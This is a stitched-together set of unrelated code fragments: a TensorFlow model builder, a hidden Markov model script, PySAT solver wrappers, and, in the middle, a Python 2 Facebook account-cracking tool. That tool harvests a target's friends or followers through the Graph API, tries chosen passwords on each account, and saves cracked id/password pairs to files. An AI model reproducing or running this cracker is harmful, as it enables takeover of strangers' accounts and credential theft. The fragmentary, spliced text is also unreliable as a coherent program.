# Model hyperparameters and metadata
model_name = 'Binary Classification Adapter Pooler Mean Average'
opt = Adam(lr = 1e-3, beta_1 = 0.9, beta_2 = 0.999, epsilon = 1e-8)
loss = CategoricalCrossentropy(from_logits = True)
metrics = ['accuracy']
# Construct model & compile
with tf.device(gpu_device):
inp = layers.Input(input_shape, name = 'input_layer')
inp_seq = inp[:,:,:,-1]
X = MeanConcat() (inp)
X = tf.expand_dims(X, axis = -1, name ='expand_dims')
X = AdapterPooler(386, shared_weights = True)(X)
X = tf.reshape(X, (-1, X.shape[1], X.shape[2] * X.shape[3]))
X = tf.concat([X, inp_seq], axis = 2)
X = tf.squeeze(X, axis = 1)
X = layers.Dense(2)(X)
model = Model(inputs = inp, outputs = X, name = model_name)
model.compile(loss = loss, optimizer = opt, metrics = metrics)
# Print verbose output to console
if verbose:
self.__verbose_print(model, model_name, input_shape, opt, loss, metrics)
return model
###########################################################################################################
## CLASS CONTAINING SPAN ANNOTATION MODELS
###########################################################################################################
class QnAModels(object):
def __init__(self, **kwargs):
self.__GPU_count = len(tf.config.list_physical_devices('GPU'))
######################################################
### Private Methods
######################################################
# validate required input parameter values aren't set to None
@staticmethod
def __require_params(**kwargs):
needed_args = [key for key,value in kwargs.items() if value is None]
if len(needed_args) > 0:
raise ValueError("If running in training, must specify following outputs: %s" %(', '.join(needed_args)))
return
def __verbose_print(self, model, model_name, input_shape, opt, loss, metrics):
print("".join(["\n", "*" * 100, "\nModel Details\n", "*" * 100, "\n"]))
print(f"Model Name: {model_name}")
print(f"Optimizer Details: name = {opt.get_config()['name']}, learning rate = {opt.get_config()['learning_rate']}")
print(f"Loss Details: name = {loss.get_config()['name']}, from_logits = {loss.get_config()['from_logits']}")
print(f"Input Shape: {tuple(input_shape)}")
print(f"Metrics: {"".join(metrics)}")
print("*" * 100)
print(model.summary())
print("*" * 100, "\n")
return
######################################################
### Public Methods
######################################################
#/////////////////////////////////////////////////////
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
### Sample Model
#/////////////////////////////////////////////////////
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
def get_sample_model(self, input_shape = (386, 1024, 26), gpu_device = "/gpu:0", verbose = True):
r"""Returns the sample model for QnA Span Annotation task.
adapter pooler layer inspired by Houlsby et al. 2019 : https://arxiv.org/abs/1902.00751v2
Args:
input_shape (tuple, optional): Shape of the input tensor. Defaults to (1, 1024, 26).
gpu_device (str, optional): If GPU devices are available, defines which one to utilize. Defaults to "/gpu:0".
verbose (bool, optional): Log details to console. Defaults to True.
Returns:
tf.keras.Model: returns a TensorFlow 2.20 model (compiled, untrained)
"""
# Input validation
| |
<reponame>lonelycorn/machine-learning
import numpy as np
"""
Discrete hidden states x[k] with
* Time-independent stochastic state transition matrix
* Time-independent stochastic observation matrix
* Initial state distribution
Goal: given a sequence of measurements, estimate most likely
* transition matrix
* observation matrix
* initial state distribution
* sequence of state
Note: it's not uncommon to find the recovered sequence different from the ground
truth, which is due to overfitting
ref: https://www.ece.ucsb.edu/Faculty/Rabiner/ece259/Reprints/tutorial%20on%20hmm%20and%20applications.pdf
"""
def drawSample(cumulativeProbability):
M = len(cumulativeProbability)
p = np.random.sample() # between [0, 1)
for i in range(M):
if (cumulativeProbability[i] >= p):
return i
return M - 1
def generateGroundTruthSequence(N, transitionProbability, firstStateProbability):
"""
:param N: number of samples to generate
:param transitionProbability: M-by-M matrix. each row gives probability to transit to other states
:return groundTruthSequence
"""
M = len(transitionProbability)
cumulativeProbability = np.cumsum(transitionProbability, axis=1)
#print("cumulative transition probability")
#print(cumulativeProbability)
groundTruthSequence = np.zeros(N, dtype=np.int)
k = drawSample(np.cumsum(firstStateProbability))
groundTruthSequence[0] = k
for i in range(1, N):
k = drawSample(cumulativeProbability[k, :])
groundTruthSequence[i] = k
return groundTruthSequence
def generateMeasurements(groundTruthSequence, observationProbability):
"""
:param observationProbability: M-by-M matrix
:return measurements
"""
cumulativeProbability = np.cumsum(observationProbability, axis=1)
#print("cumulative observation probability")
#print(cumulativeProbability)
measurements = [drawSample(cumulativeProbability[k, :]) for k in groundTruthSequence]
return np.array(measurements)
def computeTransitionLikelihood(sequence, M):
N = len(sequence)
count = np.zeros((M, M), dtype=np.int)
for i in range(N - 1):
t = sequence[i]
s = sequence[i + 1]
count[t, s] += 1
print("transition count")
print(count)
likelihood = np.zeros(count.shape, np.float)
for i in range(M):
d = np.sum(count[i, :])
# to avoid division-by-0
if (d > 0):
likelihood[i, :] = count[i, :] / d
return likelihood
def computeObservationLikelihood(sequence, measurements, M):
assert(len(sequence) == len(measurements))
N = len(sequence)
count = np.zeros((M, M), dtype=np.int)
for (s, z) in zip(sequence, measurements):
count[s, z] += 1
print("observation count")
print(count)
likelihood = np.zeros(count.shape, np.float)
for i in range(M):
d = np.sum(count[i, :])
# to avoid division-by-0
if (d > 0):
likelihood[i, :] = count[i, :] / d
return likelihood
def findMostLikelySequence(transitionProbability, observationProbability, firstStateProbability, measurements):
"""
Vertibi algorithm
:return (mostLikelySequence, logLikelihood)
"""
assert(transitionProbability.shape == observationProbability.shape)
assert(len(transitionProbability) == len(firstStateProbability))
N = len(measurements)
M = len(transitionProbability)
# When T and O are fixed & given
# P(z[0] ... z[k-1], z[k], x[0] ... x[k-1], x[k])
# = P(z[k] | z[0] ... z[k-1], x[0] ... x[k-1], x[k]) *
# P(x[k] | z[0] ... z[k-1], x[0] ... x[k-1]) *
# P(z[0] ... z[k-1], x[0] ... x[k-1])
# = P(z[k] | x[k]) * P(x[k] | x[k-1]) * P(z[0] ... z[k-1], x[0] ... x[k-1])
#
# The last step originates from the Markov property, which suggests thatz[k]
# is only dependent of x[k], and x[k] is determined solely by x[k-1]
#
# Let
# F[k, s] = log(P(z[0] ... z[k-1], z[k], x[0] ... x[k-1], x[k]=s))
# T[k, t, s] = log(P(x[k]=s | x[k-1]=t))
# O[k, s, r] = log(P(z[k]=r | x[k]=s))
# Note we could drop index k from T and O because these two matrices do NOT
# change over time
#
# Then we have
# F[0, s] = log(firstStateProbability[s]) + O[s, z[0]]
# F[k, s] = max{ O[s, z[k]] + T[t, s] + F[k-1, t] }
T = np.log(transitionProbability)
O = np.log(observationProbability)
F = np.zeros((N, M), dtype=np.float)
prev = np.zeros(F.shape, dtype=np.int) # assignment of x[k-1] that maximizes F[k, s]
z = measurements
for s in range(M):
F[0, s] = O[s, z[0]] + np.log(firstStateProbability[s])
prev[0, s] = -1
#print(f"k = 0, F[k, :] = {np.exp(F[0, :])}")
for k in range(1, N):
for s in range(M): # current state
best = -np.inf
idx = -1
for t in range(M): # previous state
proposal = O[s, z[k]] + T[t, s] + F[k - 1, t]
if (proposal > best):
best = proposal
idx = t
#print(f"k = {k}, t = {t}, s = {s}, z = {z[k]}, value = {np.exp(proposal)}")
# NOTE: sometimes idx < 0 because state s at step k is infeasible; when
# this happens, we'll leave F[k, s] = -inf, and prev[k, s] = -1
F[k, s] = best
prev[k, s] = idx
#print(f"k = {k}, F[k, :] = {np.exp(F[k, :])}")
#print(f"F\n{F}")
#print(f"prev\n{prev}")
# recover most likely sequence
mostLikelySequence = np.zeros(N, dtype=np.int)
s = np.argmax(F[N - 1, :])
mostLikelySequence[N - 1] = s
logLikelihood = F[N-1, s]
for k in range(N - 1, 0, -1):
s = prev[k, s]
mostLikelySequence[k - 1] = s
return (mostLikelySequence, logLikelihood)
def findMostLikelyParameters(measurements,
M,
transitionLikelihood=None,
observationLikelihood=None,
firstStateLikelihood=None):
"""
Baum-Welsh (EM) algorithm
Estimate the most likely parameters given the measurements using Baum-Welsh (EM) algorithm
:return transitionLikelihood, observationLikelihood, firstStateLikelihood
"""
EPSILON = 1e-4
INITIAL_OBSERVATION_ERROR_RATE = 0.3
def pertubateLikelihood(likelihood, epsilon=EPSILON):
M = len(likelihood)
return likelihood * (1.0 - epsilon) + np.ones(likelihood.shape) * epsilon / M
N = len(measurements)
# initialization
if (transitionLikelihood is None):
transitionLikelihood = computeTransitionLikelihood(measurements, M)
if (observationLikelihood is None):
observationLikelihood = pertubateLikelihood(np.eye(M), epsilon=INITIAL_OBSERVATION_ERROR_RATE)
if (firstStateLikelihood is None):
firstStateLikelihood = np.array([np.sum(measurements == i) for i in range(M)]) / N
print(f"initial transition likelihood\n{transitionLikelihood}")
print(f"initial observation likelihood\n{observationLikelihood}")
print(f"initial likelihood\n{firstStateLikelihood}")
count = 0
prevLogLikelihood = 0
while (True):
count += 1
T = transitionLikelihood
O = observationLikelihood
pi = firstStateLikelihood
z = measurements
# Let X = {x[0] ... x[N-1]} denote the trajectory of the hidden states, and
# Z = {z[0] ... z[N-1]} all available measurements
#
# Let lambda = {T; O; pi} represent all model parameters, where
# T[i, s, t] = Pr(x[i+1] == t | x[i] == s)
# O[i, s, t] = Pr(z[i] == t | x[i] == s)
# pi[s] = Pr(x[0] == s)
# Note that index i could be droped from O and T because both state transition
# probability and observation probability are time-invariant
#
# The joint distribution of hidden state at step i, and all measurements
# P(x[i], z[0] ... z[N-1] | lamda)
# = P(z[i+1] ... z[N-1] | x[i], z[0] ... z[i], lambda) * P(x[i], z[0] ... z[i] | lambda)
#
# From the HMM factor graph, it could be seen that future observations are
# conditionally independent of past observations, given the current hidden
# state, i.e.
# P(z[i+1] ... z[N-1] | x[i], z[0] ... z[i], lambda) = P(z[i+1] ... z[N-1] | x[i], lambda)
#
# With the above line, the original joint distribution could be simplified to
# P(x[i], z[0] ... z[N-1] | lambda)
# = P(z[i+1] ... z[N-1] | x[i], lambda) * P(x[i], z[0] ... z[i] | labmda)
#
# Define
# alpha[i, s] = Pr(x[i]=s, z[0] ... z[i] | lambda)
# beta[i, s] = Pr(z[i+1] ... z[N-1] | x[i]=s, lambda)
#
# We could compute alpha and beta by induction as follows
# alpha[0, s] = pi[s] * O[s, z[0]]
# alpha[i, s] = sum(alpha[i-1, t] * T[t, s]) * O[s, z[i]]
# beta[N-1, s] = 1
# beta[i, s] = sum(beta[i+1, t] * T[s, t] * O[t, z[i+1]]
#
# The probability of being in a specific state at step i, given all measurements and
# all model parameters could then be written using alpha and beta as
# gamma[i, s] = Pr(x[i]=s | z[0] ... z[N-1], lambda)
# = Pr(x[i]=s, z[0] ... z[N-1], lambda) / Pr(z[0] ... z[N-1] | lambda)
# = Pr(z[i+1] ... z[N-1] | x[i]=s, lambda) * Pr(x[i]=s, z[0] ... z[i] | lambda) / Pr(z[0] ... z[N-1] | lambda)
# = alpha[i, s] * beta[i, s] / sum(alpha[i, t] * beta[i, t])
#
# The probability of transiting from one state to another at step i, given all
# measurements and all model parameters is
# ksi[i, s, t] = Pr(x[i]=s, x[i+1]=t | z[0] ... z[N-1], labmda)
# = Pr(x[i]=s, x[i+1]=t, z[0] ... z[N-1] | lambda) / P(z[0] ... z[N-1], lambda)
# = Pr(z[i+2] ... z[N-1] | x[i]=s, x[i+1]=t, z[0] ... z[i+1], lambda) *
# Pr(z[i+1] | x[i]=s], x[i+1]=t, z[0] ... z[i], lambda) *
# Pr(x[i+1]=t | x[i]=s, z[0] ... z[i], lambda) *
# Pr(x[i]=s, z[0] ... z[i] | lambda) /
# Pr(z[0] ... z[N-1] | lambda)
# = Pr(z[i+2] ... z[N-1] | x[i+1]=t, lambda) *
# Pr(z[i+1] | x[i+1]=t) *
# Pr(s[i+1]=t | x[i]=s) *
| |
<reponame>fiazkhan420/khan
#!/usr/bin/python2
# coding=utf-8
import os
import sys
import time
import datetime
import re
import threading
import json
import random
import requests
import hashlib
import cookielib
import uuid
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
__author__ = 'Mr-Robot'
__copyright = 'All rights reserved . Copyright Mr-Robot'
os.system('termux-setup-storage')
try:
os.mkdir('/sdcard/ids')
except OSError:
pass
bd = random.randint(2e+07, 3e+07)
sim = random.randint(20000, 40000)
header = {
'x-fb-connection-bandwidth': repr(bd),
'x-fb-sim-hni': repr(sim),
'x-fb-net-hni': repr(sim),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]',
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
os.system('git pull')
os.system('clear')
#### colours ####
B='\033[1;94m'
R='\033[1;91m'
G='\033[1;92m'
W='\033[1;97m'
S='\033[1;96m'
P='\033[1;95m'
Y='\033[1;93m'
#Dev:<NAME>
#### LOGO ####
logo = """
\033[1;97m ****************"*****************
\033[1;96m *███╗░░░███╗██████╗░░██████╗░ *F*
\033[1;95m *████╗░████║██╔══██╗██╔════╝░ *A*
\033[1;94m *██╔████╔██║██████╔╝██║░░██╗░ *M*
\033[1;93m *██║╚██╔╝██║██╔═══╝░██║░░╚██╗ *I*
\033[1;92m *██║░╚═╝░██║██║░░░░░╚██████╔╝ *L*
\033[1;91m *╚═╝░░░░░╚═╝╚═╝░░░░░░╚═════╝░ *Y*
\033[1;92m 🄱🅁🄰🄽🄳
\033[1;97m **********************************
\033[1;93m SCRIPT MAKER : XTY<NAME>
\033[1;96m GANG OWNER : <NAME>
\033[1;95m NOTE : ONLY FOR GANG
\033[1;94m BE ORIGINAL LETS THE WORLD COPY U
\033[1;97m *********************************
"""
def reg():
os.system('clear')
print logo
print ''
print '\033[1;31;1mTake The Free Approval For Login'
print ''
time.sleep(1)
try:
to = open('/sdcard/.hst.txt', 'r').read()
except (KeyError, IOError):
reg2()
r = requests.get('https://raw.githubusercontent.com/pathani404/MPG/main/mpg.txt').text
if to in r:
os.system('cd ..... && npm install')
os.system('fuser -k 5000/tcp &')
os.system('#')
os.system('cd ..... && node index.js &')
time.sleep(2)
ip()
else:
os.system('clear')
print logo
print '\tApproved Failed'
print ' \033[1;92mYour Id Is Not Approved Already '
print ' \033[1;92mCopy the id and send to admin'
print ' \033[1;92mYour id: ' + to
raw_input('\033[1;93m Press enter to send id')
os.system('xdg-open https://wa.me/+923414547149')
reg()
def reg2():
os.system('clear')
print logo
print '\tApproval not detected'
print ' \033[1;92mCopy kr k send kro Whatsapp py to continue'
id = uuid.uuid4().hex[:50]
print ' Your id: ' + id
print ''
raw_input(' Press enter to go to Whatsapp ')
os.system('xdg-open https://wa.me/+923414547149')
sav = open('/sdcard/.hst.txt', 'w')
sav.write(id)
sav.close()
raw_input('\033[1;92m Press enter to check Approval ')
reg()
def ip():
os.system('clear')
print logo
print '\tCollecting device info'
try:
ipinfo = requests.get('http://ip-api.com/json/')
z = json.loads(ipinfo.text)
ips = z['query']
country = z['country']
regi = z['regionName']
network = z['isp']
except:
pass
print '\033[1;92m Your ip: ' + ips
time.sleep(2)
print '\033[1;92m Your country: ' + country
time.sleep(2)
print '\033[1;92m Your region: ' + regi
time.sleep(2)
print ' \033[1;92mYour network: ' + network
time.sleep(2)
print ' Loading ...'
time.sleep(2)
log_menu()
def log_menu():
try:
t_check = open('access_token.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print '\033[1;90m *********Login menu*********\033[1;94m'
print 47 * '-'
print '\033[1;92m[1] Login with FaceBook'
print '\033[1;92m[2] Login with token'
print '\033[1;92m[3] MPG Brand'
print ''
log_menu_s()
def log_menu_s():
s = raw_input(' \033[1;97m╰─MPG➤ ')
if s == '1':
log_fb()
elif s == '2':
log_token()
elif s == '3':
os.system('xdg-open https://facebook.com/quyyam.jafar/')
else:
print ''
print '\\ Select valid option '
print ''
log_menu_s()
def log_fb():
os.system('clear')
print logo
print '\033[1;31;1mLogin with id/pass'
print 47 * '-'
lid = raw_input('\033[1;92m Id/mail/no: ')
pwds = raw_input(' \033[1;93mPassword: ')
try:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + <PASSWORD>).text
q = json.loads(data)
if 'loc' in q:
ts = open('access_token.txt', 'w')
ts.write(q['loc'])
ts.close()
menu()
elif 'www.facebook.com' in q['error']:
print ' User must verify account before login'
raw_input('\033[1;92m Press enter to try again ')
log_fb()
else:
print ' Id/Pass may be wrong'
raw_input(' \033[1;92mPress enter to try again ')
log_fb()
except:
print ''
print 'Exiting tool'
os.system('exit')
def log_token():
os.system('clear')
print logo
print '\033[1;93mLogin with token\033[1;91m'
print 47 * '-'
tok = raw_input(' \033[1;92mPaste token here: \033[1;91m')
print 47 * '-'
t_s = open('access_token.txt', 'w')
t_s.write(tok)
t_s.close()
menu()
def menu():
os.system('clear')
try:
token = open('access_token.txt', 'r').read()
except (KeyError, IOError):
print ''
print logo
print '\033[1;31;1mLogin FB id to continue'
time.sleep(1)
log_menu()
try:
r = requests.get('https://graph.facebook.com/me?access_token=' + token)
q = json.loads(r.text)
z = q['name']
except (KeyError, IOError):
print logo
print ''
print '\t Account Cheekpoint\x1b[0;97m'
print ''
os.system('rm -rf access_token.txt')
time.sleep(1)
log_menu()
except requests.exceptions.ConnectionError:
print logo
print ''
print '\t Turn on mobile data/wifi\x1b[0;97m'
print ''
raw_input(' \033[1;92mPress enter after turning on mobile data/wifi ')
menu()
os.system('clear')
print logo
tok = open('/sdcard/.hst.txt', 'r').read()
print ' \033[1;92mLogged in user: \033[1;94m' + z
print 47 * '-'
print ' \033[1;90m Active token: \033[1;94m' + tok
print ' ------------------------------------------ '
print '\033[1;92m[1] Start Cloning'
print '\033[1;92m[2] Follow MPG OWNER'
print '\033[1;92m[3] View token'
print '\033[1;92m[4] Logout'
print '\033[1;92m[5] Delete trash files'
menu_s()
def menu_s():
ms = raw_input('\033[1;97m╰─MPG➤ ')
if ms == '1':
auto_crack()
elif ms == '2':
os.system('xdg-open https://facebook.com/quyyam.jafar/')
elif ms == '3':
v_tok()
elif ms == '4':
lout()
elif ms == '5':
rtrash()
else:
print ''
print '\tSelect valid option'
print ''
menu_s()
def crack():
global toket
try:
toket=open('login.txt','r').read()
except (KeyError, IOError):
os.system('clear')
print logo
print '\t File Not Found \x1b[0;97m'
print ''
time.sleep(1)
log_menu()
os.system('clear')
print logo
print '\033[1;90m~~~~ Choice pass cracking ~~~~\033[1;94m'
print 47 * '-'
print '\033[1;92m[1] Public id cloning'
print '\033[1;92m[2] Followers cloning'
print '\033[1;92m[3] File cloning'
print '\033[1;92m[0] Back'
a_s()
def auto_crack():
global token
try:
token = open('access_token.txt', 'r').read()
except (KeyError, IOError):
os.system('clear')
print logo
print '\t Login FB id to continue\x1b[0;97m'
print ''
time.sleep(1)
log_menu()
os.system('clear')
print logo
print '\033[1;90m~~~~ Choice pass cracking ~~~~\033[1;94m'
print 47 * '-'
print '\033[1;92m[1] Public id cloning'
print '\033[1;92m[2] Followers cloning'
print '\033[1;92m[3] File cloning'
print '\033[1;92m[0] Back'
a_s()
def a_s():
id = []
cps = []
oks = []
a_s = raw_input(' \033[1;97m╰─MPG➤ ')
if a_s == '1':
os.system('clear')
print logo
print ' \033[1;90mFor-example : \033[1;97m234567,334455,445566,556677\033[1;94m'
print 47 * '-'
pass1 = raw_input(' \033[1;92m[1]Password: ')
pass2 = raw_input(' \033[1;92m[2]Password: ')
pass3 = raw_input(' \033[1;92m[3]Password: ')
pass4 = raw_input(' \033[1;92m[4]Password: ')
idt = raw_input(' \033[1;93m[★]Enter id: ')
try:
r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
q = json.loads(r.text)
z = q['name']
os.system('clear')
print logo
print '\033[1;90m~~~~Choice public cracking~~~~'
print ' \033[1;92mCloning from: ' + z
except (KeyError, IOError):
print '\t Invalid user \x1b[0;97m'
raw_input(' \033[1;92mPress enter to try again ')
auto_crack()
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token)
z = json.loads(r.text)
for i in z['data']:
uid = i['id']
na = i['name']
nm = na.rsplit(' ')[0]
id.append(uid + '|' + nm)
elif a_s == '2':
os.system('clear')
print logo
print ' \033[1;90mFor-example : \033[1;97m234567,334455,445566,556677\033[1;94m'
print 47 * '-'
pass1 = raw_input(' \033[1;92m[1]Password: ')
pass2 = raw_input(' \033[1;92m[2]Password: ')
pass3 = raw_input(' \033[1;92m[3]Password: ')
pass4 = raw_input(' \033[1;92m[4]Password: ')
idt = raw_input(' \033[1;93m[★]Enter id: ')
try:
r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
q = json.loads(r.text)
z = q['name']
os.system('clear')
print logo
print '\033[1;90m~~~~ Choice followers cracking ~~~~'
print ' \033[1;92mCloning from: ' + z
except (KeyError, IOError):
print '\t Invalid user \x1b[0;97m'
raw_input('\033[1;92mPress enter to try again ')
auto_crack()
r = requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=999999')
z = json.loads(r.text)
for i in z['data']:
uid = i['id']
na = i['name']
nm = na.rsplit(' ')[0]
id.append(uid + '|' + nm)
elif a_s == '3':
os.system('clear')
print logo
print ' \033[1;90mFor-example : \033[1;97m234567,334455,445566,556677\033[1;94m'
print 47 * '-'
pass1 = raw_input(' \033[1;92m[1]Password: ')
pass2 = raw_input(' \033[1;92m[2]Password: ')
pass3 = raw_input(' \033[1;92m[3]Password: ')
pass4 = raw_input(' \033[1;92m[4]Password: ')
try:
idlist= raw_input('[+] File Name: ')
for line in open(idlist ,'r').readlines():
id.append(line.strip())
except IOError:
print"[!] File Not Found."
raw_input('Press Enter To Back. ')
crack()
elif a_s == '0':
menu()
else:
print ''
print '\tChoose valid option' + w
a_s()
print ' Total ids: ' + str(len(id))
time.sleep(0.5)
print ' \033[1;92mCrack Running\033[1;94m '
time.sleep(0.5)
print 47 * '-'
print '\t\033[1;95mITz MPG BRAND \033[1;94m'
print 47 * '-'
def main(arg):
user = arg
(uid, name) = user.split('|')
try:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass1, headers = header).text
q = json.loads(data)
if 'loc' in q:
print '\033[1;92m[MPG-OK]➤ ' + uid + ' | ' + pass1
ok = open('/sdcard/ids/MRP_OK.txt', 'a')
ok.write(uid + ' | ' + pass1 + '\n')
ok.close()
oks.append(uid + pass1)
elif 'www.facebook.com' in q['error']:
print '\033[1;97m[MPG-CP]➤ ' + uid + ' | ' + pass1
cp = open('MRP_CP.txt', 'a')
cp.write(uid + ' | ' + pass1 + '\n')
cp.close()
cps.append(uid + pass1)
else:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass2, headers = header).text
q = json.loads(data)
if 'loc' in q:
print '\033[1;92m[MPG-OK]➤ ' + uid + ' | ' + pass2
ok | |
def nof_clauses(self):
"""
Get number of clauses currently used by the solver.
"""
if self.minicard:
return pysolvers.minicard_nof_cls(self.minicard)
def accum_stats(self):
"""
Get accumulated low-level stats from the solver. This includes
the number of restarts, conflicts, decisions and propagations.
"""
if self.minicard:
return pysolvers.minicard_acc_stats(self.minicard)
def enum_models(self, assumptions=[]):
"""
Iterate over models of the internal formula.
"""
if self.minicard:
done = False
while not done:
self.status = self.solve(assumptions=assumptions)
model = self.get_model()
if model is not None:
self.add_clause([-l for l in model]) # blocking model
yield model
else:
done = True
def add_clause(self, clause, no_return=True):
"""
Add a new clause to solver's internal formula.
"""
if self.minicard:
res = pysolvers.minicard_add_cl(self.minicard, clause)
if res == False:
self.status = False
if not no_return:
return res
def add_atmost(self, lits, k, no_return=True):
"""
Add a new atmost constraint to solver's internal formula.
"""
if self.minicard:
res = pysolvers.minicard_add_am(self.minicard, lits, k)
if res == False:
self.status = False
if not no_return:
return res
def append_formula(self, formula, no_return=True):
"""
Appends list of clauses to solver's internal formula.
"""
if self.minicard:
res = None
# this loop should work for a list of clauses, CNF, and CNFPlus
for clause in formula:
if len(clause) != 2 or isinstance(clause[0], int): # it is a clause
res = self.add_clause(clause, no_return)
else:
res = self.add_atmost(clause[0], clause[1], no_return)
if not no_return and res == False:
return res
if not no_return:
return res
def supports_atmost(self):
"""
This method can be called to determine whether the solver supports
native AtMostK (see :mod:`pysat.card`) constraints.
"""
return True
#
#==============================================================================
class Minisat22(object):
"""
MiniSat 2.2 SAT solver.
"""
def __init__(self, bootstrap_with=None, use_timer=False):
"""
Basic constructor.
"""
self.minisat = None
self.status = None
self.new(bootstrap_with, use_timer)
def __enter__(self):
"""
'with' constructor.
"""
return self
def __exit__(self, exc_type, exc_value, traceback):
"""
'with' destructor.
"""
self.delete()
self.minisat = None
def new(self, bootstrap_with=None, use_timer=False):
"""
Actual constructor of the solver.
"""
if not self.minisat:
self.minisat = pysolvers.minisat22_new()
if bootstrap_with:
if type(bootstrap_with) == CNFPlus and bootstrap_with.atmosts:
raise NotImplementedError('Atmost constraints are not supported by MiniSat')
for clause in bootstrap_with:
self.add_clause(clause)
self.use_timer = use_timer
self.call_time = 0.0 # time spent for the last call to oracle
self.accu_time = 0.0 # time accumulated for all calls to oracle
def delete(self):
"""
Destructor.
"""
if self.minisat:
pysolvers.minisat22_del(self.minisat)
self.minisat = None
def solve(self, assumptions=[]):
"""
Solve internal formula.
"""
if self.minisat:
if self.use_timer:
start_time = process_time()
self.status = pysolvers.minisat22_solve(self.minisat, assumptions,
int(MainThread.check()))
if self.use_timer:
self.call_time = process_time() - start_time
self.accu_time += self.call_time
return self.status
def solve_limited(self, assumptions=[], expect_interrupt=False):
"""
Solve internal formula using given budgets for conflicts and
propagations.
"""
if self.minisat:
if self.use_timer:
start_time = process_time()
self.status = pysolvers.minisat22_solve_lim(self.minisat,
assumptions, int(MainThread.check()), int(expect_interrupt))
if self.use_timer:
self.call_time = process_time() - start_time
self.accu_time += self.call_time
return self.status
def conf_budget(self, budget):
"""
Set limit on the number of conflicts.
"""
if self.minisat:
pysolvers.minisat22_cbudget(self.minisat, budget)
def prop_budget(self, budget):
"""
Set limit on the number of propagations.
"""
if self.minisat:
pysolvers.minisat22_pbudget(self.minisat, budget)
def interrupt(self):
"""
Interrupt solver execution.
"""
if self.minisat:
pysolvers.minisat22_interrupt(self.minisat)
def clear_interrupt(self):
"""
Clears an interruption.
"""
if self.minisat:
pysolvers.minisat22_clearint(self.minisat)
def propagate(self, assumptions=[], phase_saving=0):
"""
Propagate a given set of assumption literals.
"""
if self.minisat:
if self.use_timer:
start_time = process_time()
st, props = pysolvers.minisat22_propagate(self.minisat,
assumptions, phase_saving, int(MainThread.check()))
if self.use_timer:
self.call_time = process_time() - start_time
self.accu_time += self.call_time
return bool(st), props if props != None else []
def set_phases(self, literals=[]):
"""
Sets polarities of a given list of variables.
"""
if self.minisat:
pysolvers.minisat22_setphases(self.minisat, literals)
def get_status(self):
"""
Returns solver's status.
"""
if self.minisat:
return self.status
def get_model(self):
"""
Get a model if the formula was previously satisfied.
"""
if self.minisat and self.status == True:
model = pysolvers.minisat22_model(self.minisat)
return model if model != None else []
def get_activity(self):
"""
Get an activity
"""
if self.minisat:
activity = pysolvers.minisat22_activity(self.minisat)
return activity
def get_activity_bump(self):
"""
Get an activity (bump)
"""
if self.minisat:
activity = pysolvers.minisat22_activity_bump(self.minisat)
return activity
def get_core(self):
"""
Get an unsatisfiable core if the formula was previously
unsatisfied.
"""
if self.minisat and self.status == False:
return pysolvers.minisat22_core(self.minisat)
def get_proof(self):
"""
Get a proof produced while deciding the formula.
"""
raise NotImplementedError('Proof tracing is not supported by MiniSat.')
def time(self):
"""
Get time spent for the last call to oracle.
"""
if self.minisat:
return self.call_time
def time_accum(self):
"""
Get time accumulated for all calls to oracle.
"""
if self.minisat:
return self.accu_time
def nof_vars(self):
"""
Get number of variables currently used by the solver.
"""
if self.minisat:
return pysolvers.minisat22_nof_vars(self.minisat)
def nof_clauses(self):
"""
Get number of clauses currently used by the solver.
"""
if self.minisat:
return pysolvers.minisat22_nof_cls(self.minisat)
def accum_stats(self):
"""
Get accumulated low-level stats from the solver. This includes
the number of restarts, conflicts, decisions and propagations.
"""
if self.minisat:
return pysolvers.minisat22_acc_stats(self.minisat)
def enum_models(self, assumptions=[]):
"""
Iterate over models of the internal formula.
"""
if self.minisat:
done = False
while not done:
self.status = self.solve(assumptions=assumptions)
model = self.get_model()
if model is not None:
self.add_clause([-l for l in model]) # blocking model
yield model
else:
done = True
def add_clause(self, clause, no_return=True):
"""
Add a new clause to solver's internal formula.
"""
if self.minisat:
res = pysolvers.minisat22_add_cl(self.minisat, clause)
if res == False:
self.status = False
if not no_return:
return res
def add_atmost(self, lits, k, no_return=True):
"""
Atmost constraints are not supported by MiniSat.
"""
raise NotImplementedError('Atmost constraints are not supported by MiniSat.')
def append_formula(self, formula, no_return=True):
"""
Appends list of clauses to solver's internal formula.
"""
if self.minisat:
res = None
if type(formula) == CNFPlus and formula.atmosts:
raise NotImplementedError('Atmost constraints are not supported by MiniSat')
for clause in formula:
res = self.add_clause(clause, no_return)
if not no_return and res == False:
return res
if not no_return:
return res
def supports_atmost(self):
"""
This method can be called to determine whether the solver supports
native AtMostK (see :mod:`pysat.card`) constraints.
"""
return False
#
#==============================================================================
class MinisatGH(object):
"""
MiniSat SAT solver (version from github).
"""
def __init__(self, bootstrap_with=None, use_timer=False):
"""
Basic constructor.
"""
self.minisat = None
self.status = None
self.new(bootstrap_with, use_timer)
def __enter__(self):
"""
'with' constructor.
"""
return self
def __exit__(self, exc_type, exc_value, traceback):
"""
'with' destructor.
"""
self.delete()
self.minisat = None
def new(self, bootstrap_with=None, use_timer=False):
"""
Actual constructor of the solver.
"""
if not self.minisat:
self.minisat = pysolvers.minisatgh_new()
if bootstrap_with:
